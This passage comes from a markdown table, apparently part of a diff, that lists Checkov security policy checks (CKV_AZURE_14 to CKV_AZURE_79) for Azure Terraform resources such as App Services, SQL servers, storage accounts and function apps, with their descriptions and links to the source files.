azurerm_windows_web_app | Ensure App Service Authentication is set on Azure App Service | Terraform | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAuthentication.py) | +| 1225 | CKV_AZURE_14 | resource | azurerm_app_service | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | Terraform | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHTTPSOnly.py) | +| 1226 | CKV_AZURE_14 | resource | azurerm_linux_web_app | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | Terraform | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHTTPSOnly.py) | +| 1227 | CKV_AZURE_14 | resource | azurerm_windows_web_app | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | Terraform | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHTTPSOnly.py) | +| 1228 | CKV_AZURE_15 | resource | azurerm_app_service | Ensure web app is using the latest version of TLS encryption | Terraform | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceMinTLSVersion.py) | +| 1229 | CKV_AZURE_15 | resource | azurerm_linux_web_app | Ensure web app is using the latest version of TLS encryption | Terraform | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceMinTLSVersion.py) | +| 1230 | CKV_AZURE_15 | resource | azurerm_windows_web_app | Ensure web app is using the latest version of TLS encryption | Terraform | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceMinTLSVersion.py) | +| 1231 | CKV_AZURE_16 | resource 
| azurerm_app_service | Ensure that Register with Azure Active Directory is enabled on App Service | Terraform | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentity.py) | +| 1232 | CKV_AZURE_16 | resource | azurerm_linux_web_app | Ensure that Register with Azure Active Directory is enabled on App Service | Terraform | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentity.py) | +| 1233 | CKV_AZURE_16 | resource | azurerm_windows_web_app | Ensure that Register with Azure Active Directory is enabled on App Service | Terraform | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentity.py) | +| 1234 | CKV_AZURE_17 | resource | azurerm_app_service | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | Terraform | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceClientCertificate.py) | +| 1235 | CKV_AZURE_17 | resource | azurerm_linux_web_app | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | Terraform | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceClientCertificate.py) | +| 1236 | CKV_AZURE_17 | resource | azurerm_windows_web_app | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | Terraform | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceClientCertificate.py) | +| 1237 | CKV_AZURE_18 | resource | azurerm_app_service | Ensure that 'HTTP Version' is the latest if used to run the web app | Terraform | 
[AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttps20Enabled.py) | +| 1238 | CKV_AZURE_18 | resource | azurerm_linux_web_app | Ensure that 'HTTP Version' is the latest if used to run the web app | Terraform | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttps20Enabled.py) | +| 1239 | CKV_AZURE_18 | resource | azurerm_windows_web_app | Ensure that 'HTTP Version' is the latest if used to run the web app | Terraform | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttps20Enabled.py) | +| 1240 | CKV_AZURE_19 | resource | azurerm_security_center_subscription_pricing | Ensure that standard pricing tier is selected | Terraform | [SecurityCenterStandardPricing.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterStandardPricing.py) | +| 1241 | CKV_AZURE_20 | resource | azurerm_security_center_contact | Ensure that security contact 'Phone number' is set | Terraform | [SecurityCenterContactPhone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactPhone.py) | +| 1242 | CKV_AZURE_21 | resource | azurerm_security_center_contact | Ensure that 'Send email notification for high severity alerts' is set to 'On' | Terraform | [SecurityCenterContactEmailAlert.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactEmailAlert.py) | +| 1243 | CKV_AZURE_22 | resource | azurerm_security_center_contact | Ensure that 'Send email notification for high severity alerts' is set to 'On' | Terraform | [SecurityCenterContactEmailAlertAdmins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactEmailAlertAdmins.py) | 
+| 1244 | CKV_AZURE_23 | resource | azurerm_mssql_server | Ensure that 'Auditing' is set to 'On' for SQL servers | Terraform | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingEnabled.yaml) | +| 1245 | CKV_AZURE_23 | resource | azurerm_mssql_server_extended_auditing_policy | Ensure that 'Auditing' is set to 'On' for SQL servers | Terraform | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingEnabled.yaml) | +| 1246 | CKV_AZURE_23 | resource | azurerm_sql_server | Ensure that 'Auditing' is set to 'On' for SQL servers | Terraform | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingEnabled.yaml) | +| 1247 | CKV_AZURE_24 | resource | azurerm_mssql_server | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Terraform | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingRetention90Days.yaml) | +| 1248 | CKV_AZURE_24 | resource | azurerm_mssql_server_extended_auditing_policy | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Terraform | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingRetention90Days.yaml) | +| 1249 | CKV_AZURE_24 | resource | azurerm_sql_server | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Terraform | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingRetention90Days.yaml) | +| 1250 | CKV_AZURE_25 | resource | azurerm_mssql_server_security_alert_policy | Ensure that 'Threat Detection types' is set 
to 'All' | Terraform | [SQLServerThreatDetectionTypes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerThreatDetectionTypes.py) | +| 1251 | CKV_AZURE_26 | resource | azurerm_mssql_server_security_alert_policy | Ensure that 'Send Alerts To' is enabled for MSSQL servers | Terraform | [SQLServerEmailAlertsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerEmailAlertsEnabled.py) | +| 1252 | CKV_AZURE_27 | resource | azurerm_mssql_server_security_alert_policy | Ensure that 'Email service and co-administrators' is 'Enabled' for MSSQL servers | Terraform | [SQLServerEmailAlertsToAdminsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerEmailAlertsToAdminsEnabled.py) | +| 1253 | CKV_AZURE_28 | resource | azurerm_mysql_server | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MySQL Database Server | Terraform | [MySQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLServerSSLEnforcementEnabled.py) | +| 1254 | CKV_AZURE_29 | resource | azurerm_postgresql_server | Ensure 'Enforce SSL connection' is set to 'ENABLED' for PostgreSQL Database Server | Terraform | [PostgreSQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerSSLEnforcementEnabled.py) | +| 1255 | CKV_AZURE_30 | resource | azurerm_postgresql_configuration | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | Terraform | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerLogCheckpointsEnabled.py) | +| 1256 | CKV_AZURE_31 | resource | azurerm_postgresql_configuration | Ensure server parameter 'log_connections' is set to 'ON' for PostgreSQL 
Database Server | Terraform | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerLogConnectionsEnabled.py) | +| 1257 | CKV_AZURE_32 | resource | azurerm_postgresql_configuration | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | Terraform | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerConnectionThrottlingEnabled.py) | +| 1258 | CKV_AZURE_33 | resource | azurerm_storage_account | Ensure Storage logging is enabled for Queue service for read, write and delete requests | Terraform | [StorageAccountLoggingQueueServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountLoggingQueueServiceEnabled.py) | +| 1259 | CKV_AZURE_34 | resource | azurerm_storage_container | Ensure that 'Public access level' is set to Private for blob containers | Terraform | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageBlobServiceContainerPrivateAccess.py) | +| 1260 | CKV_AZURE_35 | resource | azurerm_storage_account | Ensure default network access rule for Storage Accounts is set to deny | Terraform | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountDefaultNetworkAccessDeny.py) | +| 1261 | CKV_AZURE_35 | resource | azurerm_storage_account_network_rules | Ensure default network access rule for Storage Accounts is set to deny | Terraform | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountDefaultNetworkAccessDeny.py) | +| 1262 | CKV_AZURE_36 | resource | azurerm_storage_account | Ensure 'Trusted 
Microsoft Services' is enabled for Storage Account access | Terraform | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountAzureServicesAccessEnabled.py) | +| 1263 | CKV_AZURE_36 | resource | azurerm_storage_account_network_rules | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access | Terraform | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountAzureServicesAccessEnabled.py) | +| 1264 | CKV_AZURE_37 | resource | azurerm_monitor_log_profile | Ensure that Activity Log Retention is set 365 days or greater | Terraform | [MonitorLogProfileRetentionDays.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MonitorLogProfileRetentionDays.py) | +| 1265 | CKV_AZURE_38 | resource | azurerm_monitor_log_profile | Ensure audit profile captures all the activities | Terraform | [MonitorLogProfileCategories.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MonitorLogProfileCategories.py) | +| 1266 | CKV_AZURE_39 | resource | azurerm_role_definition | Ensure that no custom subscription owner roles are created | Terraform | [CutsomRoleDefinitionSubscriptionOwner.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CutsomRoleDefinitionSubscriptionOwner.py) | +| 1267 | CKV_AZURE_40 | resource | azurerm_key_vault_key | Ensure that the expiration date is set on all keys | Terraform | [KeyExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyExpirationDate.py) | +| 1268 | CKV_AZURE_41 | resource | azurerm_key_vault_secret | Ensure that the expiration date is set on all secrets | Terraform | 
[SecretExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecretExpirationDate.py) | +| 1269 | CKV_AZURE_42 | resource | azurerm_key_vault | Ensure the key vault is recoverable | Terraform | [KeyvaultRecoveryEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyvaultRecoveryEnabled.py) | +| 1270 | CKV_AZURE_43 | resource | azurerm_storage_account | Ensure Storage Accounts adhere to the naming rules | Terraform | [StorageAccountName.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountName.py) | +| 1271 | CKV_AZURE_44 | resource | azurerm_storage_account | Ensure Storage Account is using the latest version of TLS encryption | Terraform | [StorageAccountMinimumTlsVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountMinimumTlsVersion.py) | +| 1272 | CKV_AZURE_45 | resource | azurerm_virtual_machine | Ensure that no sensitive credentials are exposed in VM custom_data | Terraform | [VMCredsInCustomData.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMCredsInCustomData.py) | +| 1273 | CKV_AZURE_47 | resource | azurerm_mariadb_server | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MariaDB servers | Terraform | [MariaDBSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MariaDBSSLEnforcementEnabled.py) | +| 1274 | CKV_AZURE_48 | resource | azurerm_mariadb_server | Ensure 'public network access enabled' is set to 'False' for MariaDB servers | Terraform | [MariaDBPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MariaDBPublicAccessDisabled.py) | +| 1275 | CKV_AZURE_49 | resource | azurerm_linux_virtual_machine_scale_set | Ensure Azure linux scale set does not use basic 
authentication(Use SSH Key Instead) | Terraform | [AzureScaleSetPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureScaleSetPassword.py) | +| 1276 | CKV_AZURE_50 | resource | azurerm_linux_virtual_machine | Ensure Virtual Machine Extensions are not Installed | Terraform | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstanceExtensions.py) | +| 1277 | CKV_AZURE_50 | resource | azurerm_windows_virtual_machine | Ensure Virtual Machine Extensions are not Installed | Terraform | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstanceExtensions.py) | +| 1278 | CKV_AZURE_52 | resource | azurerm_mssql_server | Ensure MSSQL is using the latest version of TLS encryption | Terraform | [MSSQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MSSQLServerMinTLSVersion.py) | +| 1279 | CKV_AZURE_53 | resource | azurerm_mysql_server | Ensure 'public network access enabled' is set to 'False' for mySQL servers | Terraform | [MySQLPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLPublicAccessDisabled.py) | +| 1280 | CKV_AZURE_54 | resource | azurerm_mysql_server | Ensure MySQL is using the latest version of TLS encryption | Terraform | [MySQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLServerMinTLSVersion.py) | +| 1281 | CKV_AZURE_55 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Servers | Terraform | [AzureDefenderOnServers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnServers.py) | +| 1282 | CKV_AZURE_56 | resource | azurerm_function_app | Ensure that 
function apps enables Authentication | Terraform | [FunctionAppsEnableAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsEnableAuthentication.py) | +| 1283 | CKV_AZURE_57 | resource | azurerm_app_service | Ensure that CORS disallows every resource to access app services | Terraform | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDisallowCORS.py) | +| 1284 | CKV_AZURE_57 | resource | azurerm_linux_web_app | Ensure that CORS disallows every resource to access app services | Terraform | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDisallowCORS.py) | +| 1285 | CKV_AZURE_57 | resource | azurerm_windows_web_app | Ensure that CORS disallows every resource to access app services | Terraform | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDisallowCORS.py) | +| 1286 | CKV_AZURE_58 | resource | azurerm_synapse_workspace | Ensure that Azure Synapse workspaces enables managed virtual networks | Terraform | [SynapseWorkspaceEnablesManagedVirtualNetworks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SynapseWorkspaceEnablesManagedVirtualNetworks.py) | +| 1287 | CKV_AZURE_59 | resource | azurerm_storage_account | Ensure that Storage accounts disallow public access | Terraform | [StorageAccountDisablePublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountDisablePublicAccess.py) | +| 1288 | CKV_AZURE_61 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for App Service | Terraform | 
[AzureDefenderOnAppServices.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnAppServices.py) | +| 1289 | CKV_AZURE_62 | resource | azurerm_function_app | Ensure function apps are not accessible from all regions | Terraform | [FunctionAppDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppDisallowCORS.py) | +| 1290 | CKV_AZURE_63 | resource | azurerm_app_service | Ensure that App service enables HTTP logging | Terraform | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttpLoggingEnabled.py) | +| 1291 | CKV_AZURE_63 | resource | azurerm_linux_web_app | Ensure that App service enables HTTP logging | Terraform | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttpLoggingEnabled.py) | +| 1292 | CKV_AZURE_63 | resource | azurerm_windows_web_app | Ensure that App service enables HTTP logging | Terraform | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttpLoggingEnabled.py) | +| 1293 | CKV_AZURE_64 | resource | azurerm_storage_sync | Ensure that Azure File Sync disables public network access | Terraform | [StorageSyncPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageSyncPublicAccessDisabled.py) | +| 1294 | CKV_AZURE_65 | resource | azurerm_app_service | Ensure that App service enables detailed error messages | Terraform | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDetailedErrorMessagesEnabled.py) | +| 1295 | CKV_AZURE_65 | resource | azurerm_linux_web_app | Ensure that App service enables detailed error messages | Terraform 
| [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDetailedErrorMessagesEnabled.py) | +| 1296 | CKV_AZURE_65 | resource | azurerm_windows_web_app | Ensure that App service enables detailed error messages | Terraform | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDetailedErrorMessagesEnabled.py) | +| 1297 | CKV_AZURE_66 | resource | azurerm_app_service | Ensure that App service enables failed request tracing | Terraform | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnableFailedRequest.py) | +| 1298 | CKV_AZURE_66 | resource | azurerm_linux_web_app | Ensure that App service enables failed request tracing | Terraform | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnableFailedRequest.py) | +| 1299 | CKV_AZURE_66 | resource | azurerm_windows_web_app | Ensure that App service enables failed request tracing | Terraform | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnableFailedRequest.py) | +| 1300 | CKV_AZURE_67 | resource | azurerm_function_app | Ensure that 'HTTP Version' is the latest, if used to run the Function app | Terraform | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppHttpVersionLatest.py) | +| 1301 | CKV_AZURE_67 | resource | azurerm_function_app_slot | Ensure that 'HTTP Version' is the latest, if used to run the Function app | Terraform | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppHttpVersionLatest.py) | +| 1302 | 
CKV_AZURE_68 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server disables public network access | Terraform | [PostgreSQLServerPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerPublicAccessDisabled.py) | +| 1303 | CKV_AZURE_69 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Azure SQL database servers | Terraform | [AzureDefenderOnSqlServers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnSqlServers.py) | +| 1304 | CKV_AZURE_70 | resource | azurerm_function_app | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | +| 1305 | CKV_AZURE_70 | resource | azurerm_function_app_slot | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | +| 1306 | CKV_AZURE_70 | resource | azurerm_linux_function_app | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | +| 1307 | CKV_AZURE_70 | resource | azurerm_linux_function_app_slot | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | +| 1308 | CKV_AZURE_70 | resource | azurerm_windows_function_app | Ensure that Function apps is only accessible over HTTPS | Terraform | 
[FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | +| 1309 | CKV_AZURE_70 | resource | azurerm_windows_function_app_slot | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | +| 1310 | CKV_AZURE_71 | resource | azurerm_app_service | Ensure that Managed identity provider is enabled for app services | Terraform | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentityProviderEnabled.py) | +| 1311 | CKV_AZURE_71 | resource | azurerm_linux_web_app | Ensure that Managed identity provider is enabled for app services | Terraform | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentityProviderEnabled.py) | +| 1312 | CKV_AZURE_71 | resource | azurerm_windows_web_app | Ensure that Managed identity provider is enabled for app services | Terraform | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentityProviderEnabled.py) | +| 1313 | CKV_AZURE_72 | resource | azurerm_app_service | Ensure that remote debugging is not enabled for app services | Terraform | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceRemoteDebuggingNotEnabled.py) | +| 1314 | CKV_AZURE_72 | resource | azurerm_linux_web_app | Ensure that remote debugging is not enabled for app services | Terraform | 
[AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceRemoteDebuggingNotEnabled.py) | +| 1315 | CKV_AZURE_72 | resource | azurerm_windows_web_app | Ensure that remote debugging is not enabled for app services | Terraform | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceRemoteDebuggingNotEnabled.py) | +| 1316 | CKV_AZURE_73 | resource | azurerm_automation_variable_bool | Ensure that Automation account variables are encrypted | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py) | +| 1317 | CKV_AZURE_73 | resource | azurerm_automation_variable_datetime | Ensure that Automation account variables are encrypted | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py) | +| 1318 | CKV_AZURE_73 | resource | azurerm_automation_variable_int | Ensure that Automation account variables are encrypted | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py) | +| 1319 | CKV_AZURE_73 | resource | azurerm_automation_variable_string | Ensure that Automation account variables are encrypted | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py) | +| 1320 | CKV_AZURE_74 | resource | azurerm_kusto_cluster | Ensure that Azure Data Explorer (Kusto) uses disk encryption | Terraform | [DataExplorerUsesDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataExplorerUsesDiskEncryption.py) | +| 1321 | CKV_AZURE_75 | resource | azurerm_kusto_cluster | Ensure that Azure Data 
Explorer uses double encryption | Terraform | [AzureDataExplorerDoubleEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDataExplorerDoubleEncryptionEnabled.py) | +| 1322 | CKV_AZURE_76 | resource | azurerm_batch_account | Ensure that Azure Batch account uses key vault to encrypt data | Terraform | [AzureBatchAccountUsesKeyVaultEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureBatchAccountUsesKeyVaultEncryption.py) | +| 1323 | CKV_AZURE_77 | resource | azurerm_network_security_group | Ensure that UDP Services are restricted from the Internet | Terraform | [NSGRuleUDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleUDPAccessRestricted.py) | +| 1324 | CKV_AZURE_77 | resource | azurerm_network_security_rule | Ensure that UDP Services are restricted from the Internet | Terraform | [NSGRuleUDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleUDPAccessRestricted.py) | +| 1325 | CKV_AZURE_78 | resource | azurerm_app_service | Ensure FTP deployments are disabled | Terraform | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceFTPSState.py) | +| 1326 | CKV_AZURE_78 | resource | azurerm_linux_web_app | Ensure FTP deployments are disabled | Terraform | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceFTPSState.py) | +| 1327 | CKV_AZURE_78 | resource | azurerm_windows_web_app | Ensure FTP deployments are disabled | Terraform | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceFTPSState.py) | +| 1328 | CKV_AZURE_79 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure 
